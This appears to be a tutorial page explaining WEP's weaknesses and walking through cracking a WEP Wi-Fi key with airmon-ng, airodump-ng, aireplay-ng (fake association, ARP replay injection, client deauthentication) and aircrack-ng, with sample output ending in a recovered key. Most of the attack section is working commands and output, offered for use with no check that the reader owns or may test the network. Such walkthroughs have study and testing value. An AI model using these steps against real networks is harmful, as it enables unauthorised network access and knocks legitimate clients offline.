What is WEP?
Wired Equivalent Privacy (WEP) is a weak security algorithm for IEEE 802.11 wireless networks. Introduced as part of the original 802.11 standard ratified in September 1999, its intention was to provide data confidentiality comparable to that of a traditional wired network. WEP, recognizable by the key of 10 or 26 hexadecimal digits, is widely in use and is often the first security choice presented to users by router configuration tools.
Although its name implies that it is as secure as a wired connection, WEP has been demonstrated to have numerous flaws and has been deprecated in favor of newer standards such as WPA2. In 2003 the Wi-Fi Alliance announced that WEP had been superseded by Wi-Fi Protected Access (WPA). In 2004, with the ratification of the full 802.11i standard (i.e. WPA2), the IEEE declared that both WEP-40 and WEP-104 "have been deprecated as they fail to meet their security goals".
WEP CRACK
The basic concept behind WEP cracking is using aireplay-ng replay an ARP packet to generate new unique IVs. In turn, aircrack-ng uses the new unique IVs to crack the WEP key.
What is ARP? ARP is address resolution protocol: A TCP/IP protocol used to convert an IP address into a physical address, such as an Ethernet address. A host wishing to obtain a physical address broadcasts an ARP request onto the TCP/IP network. The host on the network that has the address in the request then replies with its physical hardware address.
Basic Assumptions
You are using drivers patched for injection. Use the injection test to confirm your card can inject prior to proceeding.
You are physically close enough to send and receive access point packets. Remember that just because you can receive packets from the access point does not mean you may will be able to transmit packets to the AP. The wireless card strength is typically less then the AP strength. So you have to be physically close enough for your transmitted packets to reach and be received by the AP. You should confirm that you can communicate with the specific AP by following these instructions.
There is at least one wired or wireless client connected to the network and they are active. The reason is that this tutorial depends on receiving at least one ARP request packet and if there are no active clients then there will never be any ARP request packets.
WEP Hacking Methodology
Step 1- Start the wireless card in monitor mode
The purpose of this step is to put your card into what is called monitor mode. Monitor mode is mode whereby your card can listen to every packet in the air. Normally your card will only “hear” packets addressed to you. By hearing every packet, we can later select some for injection. As well, only (there are some rare exceptions) monitor mode allows you to inject packets.First of all enter “iwconfig” to ensure you have wireless interfaces. It should look similar to this:
eth0 no wireless extensions.
Wlan0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Then to enter into monitor mode:
airmon-ng start wlan0
Step 2-Check the Access points Available
Check the available networks with following command.
Note down the following information for the AP to crack WEP:
· BSSID
· Ch
· ENC
· ESSID
Step 3- Start airodump to capture IV'S
The purpose of this step is to capture the IVs generated. This step starts airodump-ng to capture the IVs from the specific access point.airodump-ng –w "filename" -c "channel name"
where
-w is to write the captured IVs
-c is channel number
Step 4-Fakely Associate with the access point
Open a new console window in the foreground, and enter this command:aireplay-ng -1 0 -a (bssid) -h (mac of your card) -e (essid) (interface)
Step 5 -Replay Attack
The purpose of this step is to start aireplay-ng in a mode which listens for ARP requests then reinjects them back into the network. The reason we select ARP request packets is because the AP will normally rebroadcast them and generate a new IV. Again, this is our objective, to obtain a large number of IVs in a short period of time.Open another console session and enter:
aireplay-ng -3 –b "bssid" -h "mac address"
where
-3 standard ARP request replay
-b is BSSID of Access point
-h is source MAC address
It will start listening for ARP requests and when it hears one, aireplay-ng will immediately start to inject it. if your screen says “got 0 ARP requests” after waiting a long time.You can confirm that you are injecting by checking your airodump-ng screen. The data packets should be increasing rapidly. The ”#/s” should be a decent number. However, decent depends on a large variety of factors. A typical range is 300 to 400 data packets per second. It can as low as a 100/second and as high as a 500/second
You may also try to de authenticate an associated client to speed up this process of capturing an arp packet, using:
aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (where MAC_IP is the MAC address of the access point, MAC_Client is the MAC address of an associated client, mon0 is your wireless NIC).
The command output looks something like:
12:34:56 Waiting for beakon frame (BSSID: 00:11:22:33:44:55:66) on channel 6
12:34:56 Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55:66] [ 5:62 ACKs]
Step 6 -Final command to Crack
The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps.Note: For learning purposes, you should use a 64 bit WEP key on your AP to speed up the cracking process. If this is the case, then you can include ”-n 64” to limit the checking of keys to64 bits.
Open another console session and enter:
aircrack-ng -b "filename.cap"
Note: to check captured file enter “ls”
You can run this while generating packets. In a short time, the WEP key will be calculated and presented. You will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128 bit keys. If you are using the PTW attack, then you will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128 bit. These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key.
Here is what success looks like:
[00:03:06] Tested 674449 keys (got 96610 IVs)
KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)
KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%
Key Found
Now, you can use this key to login to your wifi network.